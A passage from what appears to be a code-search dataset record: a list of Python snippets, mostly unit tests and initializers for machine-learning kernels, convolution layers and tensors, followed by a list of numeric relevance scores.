repeatability\n tf.random.set_seed(12345)\n initializer = tf.keras.initializers.Zeros()\n\n # define model architecture\n input_data = Input(shape=X[0].shape)\n xx = Dense(32, activation=\"relu\", kernel_initializer=initializer)(input_data)\n output = Dense(n_classes, activation=\"softmax\", kernel_initializer=initializer)(xx)\n\n # standard way\n model = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model)\n\n # inputs and outputs not in kwargs\n model2 = SafeKerasModel(\n input_data,\n output,\n \"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model2)\n\n # batch size zero\n model3 = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n batch_size=0,\n )\n errstr = \"failed to correct batch_size=0 in init\"\n assert model3.batch_size == 32, errstr", "def test_bad_bounds(self):\n with pytest.raises(ValueError):\n Real(\"yolo\", \"norm\", 0, 2, low=+2, high=-2, shape=(4, 4))\n with pytest.raises(ValueError):\n Real(\"yolo\", \"norm\", 0, 2, low=+2, high=+2, shape=(4, 4))", "def test_multitensor_init():\n a = np.random.random((5, 5))\n b = np.random.random((4, 4))\n c = np.random.random((3, 3))\n at = Tensor(tensor=a, name='a')\n bt = Tensor(tensor=b, name='b')\n ct = Tensor(tensor=c, name='c')\n mt = MultiTensor([at, bt, ct])\n\n with pytest.raises(TypeError):\n _ = MultiTensor((at, bt))\n\n assert len(mt.dual_basis) == 0\n\n assert np.isclose(mt.vec_dim, 5**2 + 4**2 + 3**2)", "def test_initialize_InitRiseVelFromDist_normal():\n num_elems = 1000\n data_arrays = mock_append_data_arrays(rise_vel_array, num_elems)\n\n dist = NormalDistribution(mean=0, sigma=0.1)\n fcn = InitRiseVelFromDist(distribution=dist)\n fcn.initialize(num_elems, None, data_arrays)\n\n assert_dataarray_shape_size(rise_vel_array, data_arrays, num_elems)\n\n assert np.all(0 != data_arrays['rise_vel'])", "def matern_kernel(x_1, x_2, l, v):\n\n\tassert l > 0 and v > 0, \"The hyperparameters l and v must be > 0\"\n\tdist = euclidean_distances(x_1.reshape(-1,1), x_2.reshape(-1,1))\n\tdist[dist == 0.0] += 1e-10\n\tz = np.sqrt(2*v) * dist / l\n\treturn (2**(1-v)/gamma(v)) * (z**v) * kv(v, z)", "def __init__(self, **kwargs):\n super(VitisGlobalAveragePooling2D, self).__init__(**kwargs)\n self.rescale_factor = None", "def batchnorm_init(m, kernelsize=3):\r\n n = kernelsize**2 * m.num_features\r\n m.weight.data.normal_(0, math.sqrt(2. 
/ (n)))\r\n m.bias.data.zero_()", "def testMaskErrorIfIncorrectDtype(self):\n\n mask = tf.constant(0, shape=(4, 4), dtype=tf.int32)\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n with self.assertRaises(TypeError) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=(4, 4), mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Mask needs to have dtype float16, float32 or float64\"))", "def test_normalize(dummy_input):\n # Test the 2D image: H, W, C\n image, label = dummy_input(image_size=(512, 512, 3),\n label_size=(512, 512, 1))\n transform = Normalize(means=None, stds=None)\n _image, _label = transform(image, label, normalize_tags=[True, False])\n assert not (image == _image).all()\n assert (label == _label).all()\n\n # Test the 3D image: H, W, D, C\n image, label = dummy_input(image_size=(512, 512, 20, 3),\n label_size=(512, 512, 20, 1))\n transform = Normalize(means=None, stds=None)\n _image, _label = transform(image, label, normalize_tags=[True, False])\n assert not (image == _image).all()\n assert (label == _label).all()\n assert np.abs(np.mean(_image)-0) < 1e-8\n assert np.abs(np.std(_image)-1) < 1e-8", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self, in_channels, out_channels=None, kernel_size=None, stride=1, dilation=1, groups=1,\n rd_ratio=1./16, rd_channels=None, rd_divisor=8, keep_3x3=True, split_input=True,\n act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d, aa_layer=None, drop_layer=None):\n super(SelectiveKernel, self).__init__()\n out_channels = out_channels or in_channels\n kernel_size = kernel_size or [3, 5] # default to one 3x3 and one 5x5 branch. 5x5 -> 3x3 + dilation\n _kernel_valid(kernel_size)\n if not isinstance(kernel_size, list):\n kernel_size = [kernel_size] * 2\n if keep_3x3:\n dilation = [dilation * (k - 1) // 2 for k in kernel_size]\n kernel_size = [3] * len(kernel_size)\n else:\n dilation = [dilation] * len(kernel_size)\n self.num_paths = len(kernel_size)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.split_input = split_input\n if self.split_input:\n assert in_channels % self.num_paths == 0\n in_channels = in_channels // self.num_paths\n groups = min(out_channels, groups)\n\n conv_kwargs = dict(\n stride=stride, groups=groups, act_layer=act_layer, norm_layer=norm_layer,\n aa_layer=aa_layer, drop_layer=drop_layer)\n self.paths = nn.ModuleList([\n ConvNormActAa(in_channels, out_channels, kernel_size=k, dilation=d, **conv_kwargs)\n for k, d in zip(kernel_size, dilation)])\n\n attn_channels = rd_channels or make_divisible(out_channels * rd_ratio, divisor=rd_divisor)\n self.attn = SelectiveKernelAttn(out_channels, self.num_paths, attn_channels)", "def scaled_init_method_normal(sigma, num_layers):\n std = sigma / math.sqrt(2.0 * num_layers)\n\n def init_(tensor):\n return torch.nn.init.normal_(tensor, mean=0.0, std=std)\n\n return init_", "def scaled_init_method_normal(sigma, num_layers):\n std = sigma / math.sqrt(2.0 * num_layers)\n\n def init_(tensor):\n return torch.nn.init.normal_(tensor, mean=0.0, std=std)\n\n return init_", "def testMulRealConstDepthAcceptance(self):\n self.assertRaises(MambaError, mulRealConst, self.im1_1, 1.0, self.im8_2)\n self.assertRaises(MambaError, mulRealConst, self.im32_1, 1.0, self.im1_2)", "def testKernelShape(self, out_channels, padding, use_bias, in_shape,\n out_shape, stride_shape, use_output_shape):\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if 
use_output_shape else None,\n kernel_shape=[3],\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=3,\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3],\n name=\"conv1\",\n use_bias=use_bias)\n\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3, 3, 3],\n name=\"conv1\",\n use_bias=use_bias)", "def test_mie_length(self):\n kr = np.array([1, 2])\n lmin = 5\n lmax = 10\n x, y = bessel_sk.mie_bessels(kr, lmin, lmax)\n self.assertEqual(x.shape, (len(kr), lmax-lmin+1))\n self.assertEqual(y.shape, (len(kr), lmax-lmin+1))", "def test_input_dimension(self):\n knn = Knn(n_neighbors=3)\n with self.assertRaises(ValueError): knn.fit(X_train, y_test)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self, *args):\n _hypre.HypreDiagScale_swiginit(self, _hypre.new_HypreDiagScale(*args))", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv2D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [3, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def kernel_for_string(name: str, lengthscale: float = 1.) -> GPy.kern.Kern:\n variance = .3 ** 2\n if name == 'RBF':\n return GPy.kern.RBF(input_dim=1, lengthscale=lengthscale)\n if name == 'Exponential':\n return GPy.kern.Exponential(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern32':\n return GPy.kern.Matern32(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern52':\n return GPy.kern.Matern52(input_dim=1, lengthscale=lengthscale)\n if name == 'PeriodicExponential':\n return GPy.kern.PeriodicExponential(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern32':\n return GPy.kern.PeriodicMatern32(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern52':\n return GPy.kern.PeriodicMatern52(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'StdPeriodic':\n return GPy.kern.StdPeriodic(input_dim=1, period=2. 
* np.pi, lengthscale=lengthscale)\n if name == 'Brownian':\n return GPy.kern.Brownian(input_dim=1)\n if name == 'ExpQuad':\n return GPy.kern.ExpQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'OU':\n return GPy.kern.OU(input_dim=1, lengthscale=lengthscale)\n if name == 'RatQuad':\n return GPy.kern.RatQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'White':\n return GPy.kern.White(input_dim=1)\n if name == 'MLP':\n return GPy.kern.MLP(input_dim=1) # has other parameters\n if name == 'Spline':\n return GPy.kern.Spline(input_dim=1)\n if name == 'Poly':\n return GPy.kern.Poly(input_dim=1) # has other parameters\n\n raise LookupError()", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3D(\n output_channels=5,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [5, 10, 10, 10, 7]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([5], dtype=np.float32))", "def testVariablesWithAndWithoutKernels(self):\n multi_dim_feature = layers.real_valued_column(\n 'multi_dim_feature', dimension=2)\n\n linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[multi_dim_feature])\n linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n linear_variables = linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature/weight', linear_variables)\n self.assertIn('linear/bias_weight', linear_variables)\n linear_weights = linear_classifier.get_variable_value(\n 'linear/multi_dim_feature/weight')\n linear_bias = linear_classifier.get_variable_value('linear/bias_weight')\n\n kernel_mappers = {\n multi_dim_feature: [RandomFourierFeatureMapper(2, 30, 0.6, 1, 'rffm')]\n }\n kernel_linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[], kernel_mappers=kernel_mappers)\n kernel_linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n kernel_linear_variables = kernel_linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature_MAPPED/weight',\n kernel_linear_variables)\n self.assertIn('linear/bias_weight', kernel_linear_variables)\n kernel_linear_weights = kernel_linear_classifier.get_variable_value(\n 'linear/multi_dim_feature_MAPPED/weight')\n kernel_linear_bias = kernel_linear_classifier.get_variable_value(\n 'linear/bias_weight')\n\n # The feature column used for linear classification (no kernels) has\n # dimension 2 so the model will learn a 2-dimension weights vector (and a\n # scalar for the bias). 
In the kernelized model, the features are mapped to\n # a 30-dimensional feature space and so the weights variable will also have\n # dimension 30.\n self.assertEqual(2, len(linear_weights))\n self.assertEqual(1, len(linear_bias))\n self.assertEqual(30, len(kernel_linear_weights))\n self.assertEqual(1, len(kernel_linear_bias))", "def testMaskErrorIfIncorrectDtype(self):\n\n mask = tf.constant(0, shape=(4, 4), dtype=tf.int32)\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n with self.assertRaises(TypeError) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=4, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Mask needs to have dtype float16, float32 or float64\"))", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def test_wrong_length(self):\n with self.assertRaises(ValueError):\n calc_disc_b(np.ones(10), np.ones(10), np.ones(5), 0.3)", "def test_0size(self):\n Square.reset_objects()\n with self.assertRaises(ValueError) as e:\n s1 = Square(0)\n self.assertEqual(str(e.exception), \"width must be > 0\")", "def test_fail(self):\r\n self.assertRaises(Exception, conv.conv2d, T.dtensor4(), T.dtensor3())\r\n self.assertRaises(Exception, conv.conv2d, T.dtensor3(), T.dvector())", "def testRateAndStrideError(self, use_bias):\n err = \"Cannot have stride > 1 with rate > 1\"\n with self.assertRaisesRegexp(snt.NotSupportedError, err):\n snt.Conv1D(output_channels=10, kernel_shape=3,\n stride=2, rate=2, name=\"conv1\", use_bias=use_bias)", "def testCreateKernel(self):\n try:\n contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)\n self.assertEqual(retErr, 0)\n # create program\n programID, retErr = PyOpenCLInterface.CreateProgram(contextID, self.testResources.programCodeStrings)\n self.assertEqual(retErr, 0)\n buildOptions = \"\"\n retErr = PyOpenCLInterface.BuildProgram(programID, self.testResources.listDevicesIDs, buildOptions)\n self.assertEqual(retErr, 0)\n #create kernel\n kernelName = self.testResources.KernelFunctionName\n kernelID, retErr = PyOpenCLInterface.CreateKernel(programID, kernelName)\n self.assertEqual(retErr, 0)\n kernelProperties, retErr = PyOpenCLInterface.GetKernelProperties(kernelID)\n self.assertEqual(kernelProperties['Program'], programID)\n self.assertEqual(kernelProperties['id'], kernelID)\n self.assertEqual(kernelProperties['Context'], contextID)\n self.assertEqual(kernelProperties['KernelFunctionName'], kernelName)\n retErr = PyOpenCLInterface.ReleaseKernel(kernelID)\n self.assertEqual(retErr, 0)\n retErr = PyOpenCLInterface.ReleaseProgram(programID)\n self.assertEqual(retErr, 0)\n listPrograms = PyOpenCLInterface.ListPrograms()\n self.assertEqual(listPrograms, [])\n retErr = PyOpenCLInterface.ReleaseContext(contextID)\n self.assertEqual(retErr, 0)\n except:\n print \"Exception caught:\", sys.exc_info()[0]", "def test_GPLVM_rbf_linear_white_kern_2D(self):\r\n N, input_dim, D = 50, 1, 2\r\n X = np.random.rand(N, input_dim)\r\n k = GPy.kern.linear(input_dim) + GPy.kern.bias(input_dim, 0.1) + GPy.kern.white(input_dim, 0.05)\r\n K = k.K(X)\r\n Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T\r\n m = GPy.models.GPLVM(Y, input_dim, init='PCA', kernel=k)\r\n self.assertTrue(m.checkgrad())", "def test_zero(self):\n controller = LinearController(self.G, 2, mode='zero')\n sim = simulation.Simulation(self.G, 
controller, dt=self.dt)\n sim.run(self.dt)\n\n self.assertAlmostEqual(np.linalg.norm(controller.W.ravel()), 0.0)\n self.assertAlmostEqual(np.linalg.norm(controller.out), 0.0)", "def kernel_factory(s, m1, m2):\r\n m_max = max(m1, m2)\r\n A = np.zeros([s, m_max, m_max], dtype=complex)\r\n symmetry = random.choice([2, 3, 4, 6])\r\n half_sym = np.floor(symmetry / 2).astype('int')\r\n lowest_k = 0.5\r\n highest_k = 3\r\n k = np.zeros([s, symmetry])\r\n for level in range(s):\r\n k[level, :] = np.random.uniform(lowest_k, highest_k, symmetry)\r\n\r\n x, y = np.meshgrid(np.linspace(-1, 1, m_max), np.linspace(-1, 1, m_max))\r\n # dist = np.sqrt(x * x + y * y)\r\n # theta = np.arctan(x / y)\r\n arb_angle = np.random.uniform(0, 2 * np.pi)\r\n for direction in range(symmetry):\r\n ang = direction * 180 / symmetry\r\n ang = arb_angle + ang * np.pi / 180\r\n r = (x * np.cos(ang) + np.sin(ang) * y)\r\n phi = np.random.uniform(0, 2 * np.pi)\r\n for i in range(s):\r\n A[i, :, :] += np.cos(2 * np.pi * k[i, direction % half_sym] * r)\r\n\r\n # Adding normal decay\r\n sigma = np.random.uniform(0.3, 0.6)\r\n decay = gaussian_window(m_max, m_max, sigma)\r\n A = np.multiply(np.abs(A), decay)\r\n # Normalizing:\r\n A = sphere_norm_by_layer(A)\r\n return A" ]
[ "0.6572343", "0.6536193", "0.63661206", "0.6360225", "0.6295031", "0.6194598", "0.6051746", "0.5993452", "0.59858924", "0.59765357", "0.59129274", "0.5900474", "0.5889973", "0.58620816", "0.5820467", "0.58139074", "0.5799146", "0.5781969", "0.57249826", "0.57009274", "0.5688538", "0.5544956", "0.5544956", "0.5529479", "0.55000484", "0.54913867", "0.5491348", "0.54885775", "0.54483104", "0.544471", "0.5443903", "0.5437116", "0.54360473", "0.5414028", "0.541142", "0.5407814", "0.539949", "0.5389693", "0.5384821", "0.5382084", "0.53756857", "0.53756624", "0.5373655", "0.5373655", "0.5363447", "0.53514314", "0.533298", "0.5330851", "0.53145283", "0.531385", "0.5309701", "0.5303267", "0.5301944", "0.53003824", "0.52995956", "0.5290957", "0.5281488", "0.52774996", "0.52727336", "0.5250242", "0.5245496", "0.5241908", "0.5225722", "0.52250576", "0.52228576", "0.5199133", "0.51875085", "0.5186054", "0.51850694", "0.5179355", "0.5169157", "0.51663846", "0.5164515", "0.5154694", "0.5152666", "0.51522774", "0.51485693", "0.5143524", "0.5142764", "0.5142764", "0.5139899", "0.5135237", "0.5134256", "0.5132573", "0.51309055", "0.51303464", "0.51293534", "0.51241887", "0.51232314", "0.51229715", "0.5122795", "0.5117027", "0.51149416", "0.51110715", "0.5104154", "0.5099612", "0.50988656", "0.5096506", "0.5096425", "0.50949764" ]
0.6592899
0
Test that initializing a Matern1/2 kernel with 0 variance raises an exception
def test_matern12_zero_variance(matern): with pytest.raises(ValueError) as exp: matern(lengthscale=1.0, variance=0.0, output_dim=1) assert exp.value.args[0].find("variance must be positive.") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_gauss_kernel():\n\n gauss = gauss_kernel(2, 5)\n\n assert gauss.shape == (5, 5)\n assert gauss[2, 2] == 0.039788735772973836", "def test_nonpositive_nu_raises_exception(nu):\n with pytest.raises(ValueError):\n kernels.Matern(input_dim=1, nu=nu)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv1DTranspose(output_channels=1)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv2DTranspose(output_channels=1)", "def testKernelShape(self, use_bias):\n\n snt.Conv1D(output_channels=10, kernel_shape=[3], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.Conv2D(output_channels=10, kernel_shape=[3, 4], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv2D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv2D(output_channels=10,\n kernel_shape=[3, 3, 3],\n name=\"conv1\")", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3D(\n output_channels=5,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [5, 10, 10, 10, 7]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([5], dtype=np.float32))", "def testNoFeatureColumnsOrKernelMappers(self):\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier()", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv1D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv1D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3, 3\\], must be either a \"\n r\"positive integer or an iterable of positive integers of \"\n r\"size 1\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv1D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3, 3],\n use_bias=use_bias)", "def testVariablesWithAndWithoutKernels(self):\n multi_dim_feature = layers.real_valued_column(\n 'multi_dim_feature', dimension=2)\n\n linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[multi_dim_feature])\n linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n linear_variables = linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature/weight', linear_variables)\n self.assertIn('linear/bias_weight', linear_variables)\n linear_weights = linear_classifier.get_variable_value(\n 'linear/multi_dim_feature/weight')\n linear_bias = linear_classifier.get_variable_value('linear/bias_weight')\n\n kernel_mappers = {\n multi_dim_feature: [RandomFourierFeatureMapper(2, 30, 0.6, 1, 'rffm')]\n }\n kernel_linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[], kernel_mappers=kernel_mappers)\n kernel_linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n kernel_linear_variables = 
kernel_linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature_MAPPED/weight',\n kernel_linear_variables)\n self.assertIn('linear/bias_weight', kernel_linear_variables)\n kernel_linear_weights = kernel_linear_classifier.get_variable_value(\n 'linear/multi_dim_feature_MAPPED/weight')\n kernel_linear_bias = kernel_linear_classifier.get_variable_value(\n 'linear/bias_weight')\n\n # The feature column used for linear classification (no kernels) has\n # dimension 2 so the model will learn a 2-dimension weights vector (and a\n # scalar for the bias). In the kernelized model, the features are mapped to\n # a 30-dimensional feature space and so the weights variable will also have\n # dimension 30.\n self.assertEqual(2, len(linear_weights))\n self.assertEqual(1, len(linear_bias))\n self.assertEqual(30, len(kernel_linear_weights))\n self.assertEqual(1, len(kernel_linear_bias))", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv2D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3, 4],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv2D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv2D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3],\n use_bias=use_bias)", "def testKernelShape(self):\n\n snt.Conv3D(output_channels=10, kernel_shape=[3, 4, 5], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=3, name=\"conv1\")\n\n with self.assertRaisesRegexp(snt.Error, \"Invalid kernel shape.*\"):\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3, 3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3, 4])\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=3)\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3],\n use_bias=use_bias, name=\"conv1\")", "def testZeroInput(self):\n self.assertRaises(TypeError, nb.rscale,)", "def test_kernel_matrix(kernel, sample):\n sample = [ele for ele in sample] # consumed several times\n\n potato = KernelMethod(kernel)\n mat = potato.matrix(sample)\n assert np.all(np.linalg.eigvals(mat) > 0) or np.isclose(\n [np.min(np.linalg.eigvals(mat))], [0]\n )", "def test_param_cov_with_uncertainties(self, fitter):\n fitter = fitter()\n\n a = 2\n b = 100\n\n with NumpyRNGContext(_RANDOM_SEED):\n x = np.linspace(0, 1, 100)\n # y scatter is amplitude ~1 to make sure covariance is\n # non-negligible\n y = x * a + b + np.random.normal(size=len(x))\n sigma = np.random.normal(loc=1, scale=0.1, size=len(x))\n\n # compute the ordinary least squares covariance matrix\n # accounting for measurement uncertainties `sigma`\n X = np.vstack([x, np.ones(len(x))]).T\n inv_N = np.linalg.inv(np.diag(sigma) ** 2)\n cov = np.linalg.inv(X.T @ inv_N @ X)\n beta = cov @ X.T @ inv_N @ y.T\n\n # now do the non-linear least squares fit\n mod = models.Linear1D(a, b)\n\n with pytest.warns(AstropyUserWarning, match=r\"Model is linear in parameters\"):\n 
fmod = fitter(mod, x, y, weights=sigma**-1)\n\n assert_allclose(fmod.parameters, beta.ravel())\n assert_allclose(cov, fitter.fit_info[\"param_cov\"])", "def init_kernel(cls, m):\n pass", "def __init__(self, N0, N1):\n #self.w = np.zeros(N);\n self.p0 = N0/(N0+N1) \n self.p1 = N1/(N0+N1)\n self.mu0 = np.zeros(N0+N1)\n self.mu1 = np.zeros(N0+N1)\n self.covariance = 0", "def white(input_dim,variance=1.):\r\n part = parts.white.White(input_dim,variance)\r\n return kern(input_dim, [part])", "def test_calculate_variance_covariance_zero_division_shape(self):\n\n _var_covar = calculate_variance_covariance(22, 620.0, 0.4239, 0.0)\n self.assertAlmostEqual(_var_covar[0][0], 0.006105992)\n self.assertAlmostEqual(_var_covar[0][1], 0.03925982)\n self.assertAlmostEqual(_var_covar[1][0], 0.03925982)\n self.assertAlmostEqual(_var_covar[1][1], -0.7475704)", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3DTranspose(\n output_channels=7,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [7, 10, 10, 10, 5]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([7], dtype=np.float32))", "def test_low_variance(self):\n # Cycle through various initializations\n initializations = ['random', 'pca']\n allowed = 1e-3\n\n for init in initializations:\n tsne = TSNE(initialization=init, perplexity=2)\n embedding = tsne.prepare_initial(self.x)\n np.testing.assert_array_less(np.var(embedding, axis=0), allowed,\n 'using the `%s` initialization' % init)", "def normal_init(m, mean, std):\n if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d):\n m.weight.data.normal_(mean, std)\n m.bias.data.zero_()", "def abe(img,variance):\n nominator = img**2-3*variance\n nominator[nominator<0] = 0\n out = np.divide(nominator,img)\n out[img==0]=0\n return out", "def test_fixedkernel(self):\r\n X = np.random.rand(30, 4)\r\n K = np.dot(X, X.T)\r\n kernel = GPy.kern.fixed(4, K)\r\n kern = GPy.kern.poly(5, degree=4)\r\n self.assertTrue(GPy.kern.kern_test(kern, verbose=verbose))", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv2D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [3, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def __init__(self, kernel_parameter: Union[int, float] = 1, nu=1.5):\n super().__init__(kernel_parameter)\n self.nu = nu", "def test_calculate_variance_covariance_zero_division_scale(self):\n\n _var_covar = calculate_variance_covariance(22, 620.0, 0.0, 0.6142)\n self.assertAlmostEqual(_var_covar[0][0], -0.0005236216)\n self.assertAlmostEqual(_var_covar[0][1], 
